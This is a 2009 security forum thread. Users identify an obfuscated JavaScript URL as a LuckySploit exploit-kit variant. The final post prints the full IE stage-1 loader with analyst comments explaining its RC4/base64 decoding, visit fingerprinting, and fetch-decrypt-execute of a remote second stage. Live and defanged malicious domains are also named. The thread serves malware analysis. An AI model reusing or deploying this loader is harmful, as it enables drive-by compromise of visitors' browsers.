

Title: JavaScript
Post by: sualck on May 27, 2009, 12:57:10 pm
What is it?

hxxp://cameronzfunz.com/spl1/?29e898d7718e8d86e0436480200291b7
Title: Re: JavaScript
Post by: RS-232 on May 27, 2009, 02:13:01 pm
...According to Kaspersky, it appears to be a LuckySploit variant:
http://virusscan.jotti.org/en/scanresult/ad5ef483c8cec20e4ec86332ab1126e881faabde
But I'm certainly not the JS guru around, meaning you'll probably have to wait a bit in order to get a more detailed answer...  :)

PS: By the way, both jsunpack and Wepawet seemed to have trouble deciphering this one...  :(
Title: Re: JavaScript
Post by: SysAdMini on May 27, 2009, 02:23:02 pm
What is it?

hxxp://cameronzfunz.com/spl1/?29e898d7718e8d86e0436480200291b7

The URL format and the fact that the script is served gzip-compressed are indicators of LuckySploit.
Unfortunately, Malzilla is unable to decode it, and Wepawet fails too.

Same problem occurs at
poppka.net/pore/?7876256053563003de306eb5c094240d
Title: Re: JavaScript
Post by: JohnC on May 30, 2009, 09:24:48 pm
What is it?

hxxp://cameronzfunz.com/spl1/?29e898d7718e8d86e0436480200291b7

The URL format and the fact that the script is served gzip-compressed are indicators of LuckySploit.
Unfortunately, Malzilla is unable to decode it, and Wepawet fails too.

Same problem occurs at
poppka.net/pore/?7876256053563003de306eb5c094240d


From cameronzfunz.com — the obfuscated landing-page script as retrieved; analyse it in an isolated environment, not in a live browser:

<html><body><script>/*
 * Review annotations (analyst notes, code left byte-identical).
 *
 * This is an obfuscated stage-1 loader. Every string it needs ("fromCharCode",
 * "length", "charCodeAt", "createElement", "ActiveXObject", ...) is assembled at
 * run time from the fragment variables declared below, joined through comma
 * expressions and constant-folded ternaries, so no meaningful literal appears.
 * With the fragments joined, the visible code does the following:
 *
 *  - fuci is built up, in several steps, to the base64 alphabet
 *    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".
 *  - actis/videro/atye/bull/vealer/good/spiris/abiere implement RC4 over the
 *    shared globals aequae (S-box), dicunt/absim (i/j), herbam (swap temp) and
 *    dent (output buffer); cadis(key, data) is the RC4 entry point.
 *  - noxam(alphabet, n) returns n Math.random()-chosen characters;
 *    alicui/imus are a base64 encoder/decoder over fuci.
 *  - modo starts as "a" and accumulates environment flags: "@" when
 *    window.parent != window (framed), "!" when an IE userData store already
 *    holds an attribute (repeat visit).
 *  - ictuum = modo + noxam(fuci, 30) is the per-visit key. fori() sends an
 *    IE XMLHTTP GET to the current URL with query
 *    "?" + base64(RC4("posuiccc", ictuum)); on readyState 4 / status 200 it
 *    runs Function(RC4(ictuum, base64decode(responseText)))().
 *
 * Practitioner notes: everything is IE-specific (document.parentWindow,
 * ActiveXObject, addBehavior), which is consistent with generic analysers
 * failing on it. Because "posuiccc" is a constant in the page, an analyst with
 * a traffic capture can recover the per-visit key from the query string and
 * decrypt the stage-2 reply; the reply itself is not part of this listing.
 * Do not execute this in a live browser.
 */actus=7677;atre=7;absens='o';valent=2;segnis='l';laus='m';collem='Ms';silvis="c";adfatu=6;curro=616;tutior=2916;delum=79;lisci=917;sidit=5086;alter=9;pisces=1;crook="9";parua=78;slip="52";fluens="n";reddar="o";troius='self';pelagi=2616;nodiqu="s";sturt=1155;eximia=234;pedis='par';fletus=938;subita='y';resono="espo";promam='2.18e2';texant=8210;orabat=5;snout='ML';vesta='';epulae="v";sulcus=244;slim="d";abis="me";scrub='t';fruges="684";summas='f';fumea=52;duros='h';passis='de';unum=0;animum='8e0';conixi='in';grates='win';volvis='E';orbo='est(';vident='nt';festa="te";legat='[';tribui=407;stavit='237';menses=256;erique='w';nigra='peo';laver='ow';miscet="0.2";capta='ew';redet=663;inibam=349;etimus='W';laude=3356;impius="";atrae="setAtt";gravem=933;quaero=81;poker='entW';autque=6263;sniper="i";voti=4;duck='3.';auibus=432;doce=83;quinta="942";sparso='do';factio=' ';evenam=47;matres=118;nullam="8";bung="t";ecloga='i';tute='!';motum='onre';riget=534;rhemum='][U';levent=2946;recens="6.38e2";bodger=39;tonsis='u';spque='pa';sidam='NIQ]';pallae='x';uisuri='GHIJK';chook="a";volant=2757;quod=8;legus=".7945";ducens='le';kylie='IQ';dentur='k';mensae='qr';sparsa="St";latine="75";milia='unc';aptabo='1.';aequem='re';auito='Mic';uocant='cti';vivum='e';brekky=474;numine='r';avido='R';ripis='3';tendam=5186;victui='nop';secus=3477;adires='a';gibson=".28";hatter=9246;amavit=3;milk='indow';frib=238;fugere='#';moveat='X';versa='7';banana=4391;fuci=(636,''+'A'+'B'+'C'+'D'+'E'+'F'+'');qualis=(8898,'ring');function actis(vellem){aequae=new vellem()}function videro(curru,armari){for(dicunt=0;dicunt<curru;dicunt++)armari[dicunt]=dicunt}function atye(cptae,water){for(dicunt=0;dicunt<cptae;dicunt++){absim=(absim+aequae[dicunt]+water[fixit](dicunt%water[uritis]))%cptae;herbam=aequae[dicunt];aequae[dicunt]=aequae[absim];aequae[absim]=herbam}}function bull(feci,ducem){dicunt=(dicunt+1)%ducem;absim=(absim+aequae[dicunt])%ducem;vealer();aequae[absim]=herbam;good(feci)}function 
// Above: actis() allocates the S-box (new Array via edereeea), videro() fills it with
// 0..255, atye() is the RC4 key-scheduling loop keyed by `water`, bull() is one PRGA step.
// Below: vealer()/good()/spiris()/abiere() complete RC4 (swap, XOR of one byte via
// String.fromCharCode, loop over the input, reset of i/j). The rest of this line resolves
// names from fragments: potius=fallas is called with `this` (window); eaque="fromCharCode",
// uritis="length", amnesaai=String reached through document.parentWindow.window (IE only),
// flecti="unction", nescii=document. The try block that starts here uses the IE
// "#default#userData" behaviour on a <span> as a persistent client-side marker.
vealer(hamis){herbam=aequae[dicunt];aequae[dicunt]=aequae[absim]}function good(diriit){dent+=amnesaai[eaque](diriit[fixit](silici)^aequae[(aequae[dicunt]+aequae[absim])%256])}function spiris(feci){for(silici=0;silici<feci[uritis];silici++){bull(feci,256)}}function abiere(vacare){dicunt=vacare;absim=vacare}potius=(auibus,fallas);modo=(0.4600>=6e0?.1:'a');('0.5'<2.2e1?potius:5.)((1<=2.8e2?this:4));infit=(.837>7.527e3?0.8:imus);fuci+=(4.52e2<0.419?3e0:uisuri+'LMNO');timeas=(5596.,noxam);natos=("313."<doce?.47:censes);reel=(latine>=bodger?adnant:matres);clarusttr=(9.<=18?timeas:.4);sirius=("589">0.95?natos:parua)[(792<0.4e1?sturt:"doc"+"ume"+"nt")];eaque=(.9,'fro')+(4.,'mC')+(8022,''+duros+'a'+'r'+'')+(86,'C')+(5853>8807.?38:'ode');uritis=('91'<5.5e1?.9895:ducens)+(6.04e2<=1?.3695:'ng')+(9e1>="0.4"?'th':.721);amnesaai=(atre,sirius)[("24."<3.71e2?'pa'+'re'+'nt'+'Win'+'d'+'ow':.4795)][(quinta<4.7e1?6229:''+'w'+'i'+'n'+'d'+'o'+'w'+'')][(0.542,''+'S'+'')+(358.,'t')+(.956,qualis)];fuci+=(5<5e1?vesta+'P'+'Q'+avido+'S'+'T'+'U'+'':954.)+(4115.>892.?'VWXY'+'Z':2798);averna=(25.<=8.7e1?'r'+'a'+'y'+'':226);pota=('1.1e1'>=5.669e3?4.194e3:'ath');uere=(4,reel);flecti=(7130,milia)+(levent>=4.753e3?5.983e3:vesta+'t'+ecloga+'o'+'n'+vesta);nescii=(940.>=quod?sirius:650);try{tonsae=('143'<=quaero?5:'er')+(0.65,'Da');errem=(8.55e2,fugere);aliam=(795.,''+spque+'');dolori=(.83<='0.359'?2.5e1:'d'+vivum+'fa'+'u'+'l'+'t'+vesta);errent=(4e0,errem);var 
// suorum = document.createElement("span"); suorum.addBehavior("#default#userData");
// document.body.appendChild(suorum); suorum.load("[HASH][UNIQ]"). "[HASH]"/"[UNIQ]" look
// like server-side template placeholders that were never substituted in this capture.
// If the store holds no attributes: setAttribute("lasttime", new Date()) then save();
// otherwise modo += "!" (repeat-visit flag). Any error is swallowed by catch(ascani){}.
// Afterwards fuci is completed to the full base64 alphabet and fixit="charCodeAt".
// The `if(fuci["eval"])` test blanks the alphabet when the string object carries an
// unexpected "eval" property — presumably an emulator/hook check; unconfirmed.
suorum=(orabat,nescii)[(8.36e2,""+silvis+"r"+"ea"+festa+"El"+"e"+abis+fluens+bung+"")]((163>.1?'s':5.2e1)+(atre>=4469?0.5e1:aliam)+(38,'n'+vesta));apum=(pelagi,errem)+(7580,dolori)+(0.3565,errent)+(0.9225>"131"?203:'us'+vesta)+(9373,tonsae)+(.1,'ta');(2<=8.944e3?suorum:273)[("7487"<=6.?7.9e1:""+chook+"d"+slim+"B"+"e"+"h"+chook+epulae+sniper+reddar+"r"+"")]((50,apum));("0.41">=2?4653:nescii)[(9.,""+"b"+reddar+slim+"y"+impius)][("0.60">=.5993?""+chook+"p"+"p"+"e"+fluens+slim+"C"+"h"+sniper+"l"+"d"+impius:6.238e3)]((7789.>6729.?suorum:5e0));(2.049e3<=0.6364?.29:suorum)[(6e0<="348"?"loa"+"d":5e0)]((7.14e2,'[HASH'+']'+'[UNIQ]'));if((actus,suorum)[(3,"X"+"M"+"L"+"D"+"oc"+"um"+"en"+"t")][('.733'>=479?1511:""+"do"+silvis+"u"+"me"+"nt"+"Ele"+"m"+"e"+"nt")][(8.21e2,chook+"t"+"tr"+"ib"+"u"+"te"+"s"+impius)][(5.19e2>=8611?8:uritis)]==(4.6e1>=nullam?unum:9.)){(.2907,suorum)[(1.6e1<'8.031e3'?atrae+"ribute"+impius:3e0)](('54'>=.21?'last':5941.)+(876>'40'?''+scrub+ecloga+'m'+'e'+vesta:4.62e2),new ("7"<=56.?Date:4)());(voti<='3545'?suorum:4.75e2)[(2134.<=0.9073?4e0:"s"+"av"+"e")]((9590.,''+'[H'+'A'+'S'+'H'+rhemum+'NI'+'Q]'+vesta))}else{modo+=(7e0>=.3?'!':3.18e2)}}catch(ascani){}fuci+=(tribui<"39."?8.088e3:''+'a'+'b'+'c'+'d'+vivum+vesta)+(84>788.?quod:''+'f'+'g'+duros+'i'+'j'+dentur+'l'+'m'+'');compo=(6.>=quod?2581:vivum);disces=(548<=recens?nescii:3e0);agros=(amavit,cadis);landem=(".6021">=0.7312?0.38:'va');fuci+=(4.7e1,victui+mensae+'stu')+(9.159e3<=2133.?0.7e1:'vw'+'xy'+'z01'+'23'+'4')+(0.81,''+'5'+'6'+versa+'8'+'9'+'+'+'/'+'='+'');fixit=(683,'c'+'h'+vesta)+(54,adires+'rC'+'')+(4<=9.?vesta+'od'+'eA'+'t':7e0);if(('5.'>6?6:fuci)[(.8824<=8835?compo:4.8e1)+(6536<='.831'?.8:landem)+(fletus<=latine?5918:''+'l'+vesta)]){fuci=(2700.,'');disces=(2.71e2,fuci)}tendit=("15.">443?70.:vesta+'o'+'r'+adires+'g'+vivum+'');ulmo=(".184"<banana?'g'+'l'+vesta:69);sidus=(.8258,'ob'+adires+vesta);laxo=(185.>5e1?disces:.4);function 
// cadis(key, data): RC4 entry point — new S-box, identity fill (256), KSA keyed by `key`,
// reset i/j to 0, PRGA XOR over `data`, returns the global output buffer `dent`.
// adnant(): XMLHTTP factory — new ActiveXObject("Msxml2.XMLHTTP"), falling back to
// "Microsoft.XMLHTTP"; returns undefined if both constructors throw.
// transi=Function, edidityye=ActiveXObject, rahrahazz=Math, edereeea=Array, all looked up
// through document.parentWindow.self.window (IE). fonsyye (next line) is an unused Array.
cadis(angues,uanam,cavae,fudit){(440,actis)((.1>31?6.41e2:edereeea));("4843.">=inibam?videro:46)((tendam,256),(alter<="4.666e3"?aequae:9.56e2));(0.218,abiere)((.2,unum));(4.8e1>"69"?.5299:atye)((.576>9?.62:menses),(652>='.1'?angues:0.84));(animum>26?1:abiere)((876,unum));dent=(1.8e1>=184.?.350:'');(0.80,spiris)((1.86e2>='4.8e1'?uanam:9207.));return (6e0,dent)}uxoreseea=(.2596>=0.1?laxo:0.6);function adnant(bolam,noctum,levas,dong){var uertit;try{uocavi=(63.,vesta+'x'+'ml'+'2.'+'X');annoso=(volant,'H'+'TT'+'P'+vesta);dabor=(adfatu>='0.413'?uocavi:8e0)+(6817,'ML')+(8.2e1,annoso);uertit=new (3.184e3>'4.09e2'?edidityye:.7)((51.,collem)+(68>2.4e2?.6:dabor))}catch(road){try{annoso=(5>=.14?'HTTP':6.32e2);dabor=(3,vesta+'r'+absens+'s'+'o'+summas+vesta)+(37,'t.XML'+'')+(9.883e3>=.665?annoso:0.9);uertit=new (voti<606?edidityye:amavit)((5.<'241.'?auito:.74)+(5240<=5.9e1?9300:dabor))}catch(morsu){}}return (7546.,uertit)}transi=(7e0,uxoreseea)[(9.4e1,'par'+poker+milk)][(0.1e1>9.849e3?.21:'self')][('9'<720.?'wind'+'ow':1.23e2)][(versa<=3.2e1?vesta+summas+'r'+'a'+laus+'e'+'s'+'':95.)][(9e0<legus?1e0:vesta+'se'+'lf'+vesta)][(963,vesta+'F')+(4.5e1<'8728'?flecti:.539)];edidityye=(2.7e1<=305?uxoreseea:adfatu)[(845<'960'?spque+aequem+'nt'+etimus+'ind'+'ow'+'':0.3)][(4427<6.51e2?.31:vesta+'s'+vivum+'l'+'f'+vesta)][("6e0">7?4e0:''+'w'+conixi+'d'+laver+vesta)][(935.,'A')+(.9<=amavit?vesta+uocant:9993.)+(0.034e3<1?14:''+'v'+vivum+moveat+'')+(8.83e2,vesta+'O')+(7e0>=9879?4.477e3:'bject'+vesta)];rahrahazz=(1981.>secus?7.115e3:uxoreseea)[(9e0<9.4e1?spque+'r'+'en'+'tWi'+'nd'+'ow':9.)][(3.273e3<0.896?3.694e3:'self')][(659.,'M')+(eximia,pota)];edereeea=(9613,uxoreseea)[(14.,''+pedis+'en'+scrub+'Win'+'do'+erique)][(287<'7.01e2'?vesta+erique+ecloga+'n'+'d'+absens+erique+vesta:275)][(6.1e1>=181.?2.3e1:'A')+('308'<=7.?2.587e3:'r')+(1920.,averna)];fonsyye=new 
// Beacon and stage-2 fetch. ictuum = modo + noxam(fuci, 30): the per-visit key — the
// environment flags followed by 30 Math.random() characters (not cryptographic randomness).
// octo = Function("return uere()") (XHR factory), termazz = Function("x","y","return agros(x,y)")
// (RC4 via agros=cadis), parveiiy = Function("x","return fori(x)"); viso="onreadystatechange".
// parveiiy(ictuum) starts fori(): async GET to the current URL with query
// "?" + base64(RC4("posuiccc", key)), then send(0). festi(): when readyState==4 and
// status==200, Function(RC4(key, base64decode(responseText)))() — the server reply is
// decrypted with the key this client just sent and executed as the next stage.
// sinat()/volgo(): append Math.random()-chosen characters of `angues` to the global `cepi`.
(7.45e2,edereeea)();anne=(amavit<=duck?'G':.62);turno=(2.33e2>9.57e3?riget:transi);ictuum=(.796<=4e0?modo:laude)+(crook>=0.2?clarusttr:.11)((31.,fuci),(2,30));verusaav=(67,alicui);tortis=(.2,'T');octo=(797<='.8'?514.:turno)((3.7e1,'ret')+(3e0>=4.695e3?.64:'urn '+'')+(2e0,''+'u'+vivum+'r'+'e'+'('+')'+vesta));termazz=(.3600,turno)((.95,vesta+'x'+vesta),('6'<=5.?5:subita),(miscet<=59.?vesta+numine+'e'+scrub+vesta:1292)+(.6186,'urn ')+(5.2e1,vesta+'ag'+numine+absens+'s'+'('+'x'+',y'+')'));parveiiy=(.7410,turno)((.6<612.?pallae:973),(0.71,'ret'+vesta)+(5154.<3.2e1?quod:'urn ')+(.5,vesta+summas+absens+numine+ecloga+'('+pallae+')'+vesta));viso=(4.1e1<3?.33:vesta+motum+vesta)+(612.,'adyst')+(8e0,'atec')+(.39<"8e0"?vesta+duros+'an'+'g'+vivum:2032);audies=(6198<"2.843e3"?7e0:volvis);(842.<=".5"?0.8286:parveiiy)((8e0<=stavit?ictuum:892.));function fori(colit,vellit,cocyto,coles){var areae=(1.021e3>gibson?octo:sidit)();("5.38e2"<=pisces?.209:areae)[(3.9e1>"4."?"open":.1)]((9425.<254?628.:anne)+(6e0,audies)+(autque>=4.?tortis:0.714),(9.75e2,vesta+'?'+vesta)+(valent>0.5640?verusaav:83.)((orabat<=9245.?termazz:958)((5e0>=88?.38:vesta+'pos'+'uiccc'+vesta),(fruges>=7.?colit:6852))),(55,true));                         areae[(806.,viso)]=(207,festi);function festi(){if((1.4e1,areae)[(1e0>='7.9e1'?texant:"ready"+sparsa+chook+festa)]==(845.,voti)&&(529,areae)[('8526'>=0.44e2?impius+"s"+bung+chook+"t"+"u"+"s"+impius:3.2e1)]==(1.,200)){('0.665e3'>8?turno:4.5e1)((0.1677<4968.?termazz:.5)((6.262e3>'881'?colit:27.),(5.985e3<'2.4e1'?0.9:infit)((7e0<=36?areae:7e0)[(.2092,"r"+resono+"ns"+"eText")])))()}};(.256,areae)[(0.5,impius+nodiqu+"e"+fluens+slim+"")]((5503.>415?unum:371))}function sinat(angues,coral,genta,olivae){  var batt=rahrahazz["floor"](rahrahazz["random"]()*angues[uritis]);cepi+=angues["substring"](batt,batt+1)}function volgo(uanam,angues,cepi,manabo){for(dicunt=0;dicunt<uanam;dicunt++){sinat(angues,dicunt,uanam,cepi);}}function 
// noxam(alphabet, n): n random characters via volgo/sinat, returned from the global `cepi`.
// alicui(): base64 encoder over fuci, inserting "\n" after every 76 output characters and
// "="/"==" padding. imus(): base64 decoder over fuci; it stops at the first "=" or "\n",
// so only a single-line response body is decoded.
// fallas(win): sets global censes=win; if win.parent==win (top-level) putans="a",
// otherwise modo += "@" (page is framed).
noxam(angues,uanam,manabo,manent){cepi='';volgo(uanam,angues,cepi,manabo);return cepi}function alicui(memora,wright,turmae,equo){var ultor=('502.'<=brekky?0.46:'');var dent;var dicunt;var contos=(orabat>=3e0?unum:2.);var luco=('1603'<0.6711?5.383e3:pisces);dicunt=(2.68e2>4.2e1?unum:54.);for(dent=0;dicunt<memora[uritis];dicunt++,dent++){contos=contos*256+memora[fixit](dicunt);luco=luco*4;ultor=ultor+fuci["charAt"](parseInt(contos/luco));contos=contos%luco;if(luco==64){ultor=ultor+fuci["charAt"](parseInt(contos));contos=0;luco=1;dent++}if(dent>=75){dent=-1;ultor=ultor+'\n'}}if((.2<=atre?dicunt:pisces)%(0.538e3,3)){ultor=ultor+fuci["charAt"](parseInt(contos*((dicunt%3==1)?16:4)));ultor=ultor+((dicunt%3)==1?'==':amnesaai[eaque](61))}return (21,ultor)}function imus(memora,villis,posuit,certae){var ultor=("53.">=64.?8.3e2:'');var dicunt;var contos=(.45<=2?unum:75);var luco=(57,1);for(dicunt=0;dicunt<memora[uritis];dicunt++){if(memora["charAt"](dicunt)==amnesaai[eaque](61)||memora["charAt"](dicunt)=='\n')break;contos=contos*64+fuci["indexOf"](memora["charAt"](dicunt));luco=(luco==1?64:luco/4);if(luco!=64){ultor=ultor+amnesaai[eaque](parseInt(contos/luco));contos=contos%luco}}return (38,ultor)}function fallas(rooted,acies,hecate,scies){this[(1039>.7905?"cen"+"se"+nodiqu:.37)]=(7264,rooted);if(("1135">2.?rooted:0.3)[(7.23e2<=lisci?impius+"p"+chook+"r"+"e"+fluens+bung+"":72.)]==(83,rooted)){putans=(.982<8e0?adires:.53)}else{modo+=(0.2<556?'@':1.552e3)}}</script>